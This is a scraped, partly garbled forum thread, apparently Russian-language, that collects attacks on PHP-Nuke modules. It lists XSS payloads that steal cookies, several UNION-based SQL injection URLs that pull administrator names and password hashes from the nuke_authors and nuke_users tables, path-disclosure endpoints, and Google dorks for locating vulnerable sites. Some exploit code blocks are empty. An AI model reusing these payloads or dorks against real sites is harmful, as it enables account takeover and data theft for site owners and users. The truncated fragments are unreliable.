![]() |
PHP-NUKE NukeSentinel Module
Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename.
[Local File Inclusion] PHP код:
PHP код:
[Full path disclosure] PHP код:
(c) MustLive <mustlive_(at)_websecurity.com.ua> |
XSS
Код:
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>barPHP код:
Search Module(all versions) <img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) < <iframe src=http://www.google.com style=display:none onload=alert(document.cookie) < Pool and News Module PHP код:
Код:
modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*modules.php?name=Reviews&rop=preview_review&title= f001&text=f002&score=9&email=00@b.org&reviewer=oob &date=00b /modules/Web_Links/voteinclude.php /modules.php?name=Statistics&op=convert_month /modules.php?name=Journal&file=add&filelist=oob /modules.php?name=Journal&file=modify&filelist=oob /db/db.php index.php?inside_mod=1 /modules.php?name=Downloads&d_op=menu /modules.php?name=Web_Links&l_op=menu modules.php?name=Web_Links&l_op=viewlink&cid=1&sho w=oob modules/NukeJokes/mainfunctions.php modules.php?name=NukeJokes&func=JokeView&jokeid=oo b modules.php?name=NukeJokes&func=CatView&cat=oob modules.php?name=Downloads&d_op=viewdownload&cid=2 &show=oob modules/Calendar/config.php modules/Calendar/index.php /modules/Calendar/submit.php error.php?newlang=foobar modules/coppermine/include/crop.inc.php modules/coppermine/ecard.php modules/coppermine/displayecard.php modules/coppermine/db_input.php modules/coppermine/config.php modules/coppermine/addpic.php modules/coppermine/phpinfo.php modules/NukeJokes/mainfunctions.php modules.php?name=NukeJokes&func=JokeView&jokeid=fo obar modules.php?name=NukeJokes&func=CatView&cat=foobar modules.php?name=Video_Gallery&l_op=viewcat&catid= darkbicho modules.php?name=Video_Gallery&l_op=viewclip&clipi d=darkbicho&catid=1 dork: "create the Super User" "now by clicking here" inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation" "Warning: setlocale()" intitle:PHP-nuke.powered.site "create * Super User" "now * clicking here" "Powered by PHP-Nuke" Copyright © 2003 by PHP-Nuke "allinurl:modules.php sgallery" "powered by phphnuke 6.0" intitle:"PHP-Nuke Powered Site" |
PHP-Nuke <= 8.0 (sid) Remote SQL Injection
Remote SQL Injection
Vulnerable: PHP-Nuke <= 8.0 Exploit: Код:
<?php |
Remote SQL Injection
PHP-Nuke < 8.0 Exploit Код:
<?php |
PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability
example Код:
http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}EXPLOIT 1 : Код:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201EXPLOİT 2 : Код:
-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201 |
PHP-Nuke Module Sections (artid) Remote SQL Injection
SQL Injection Код:
Пример:Код:
allinurl: "имя секции" |
PHP-NUKE Modules Okul v1.0 Remote SQL Injection
SQL Injection Код:
modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*PHP-Nuke Module Inhalt (cid) SQL Injection SQL Injection Код:
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2 |
PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection
SQL Injection Код:
modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*PHP-Nuke Module Siir (id) Remote SQL Injection SQL Injection Код:
modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202Код:
allinurl: modules-php-name-Siir |
PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection
PoC: Код:
/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2 |
| Время: 22:26 |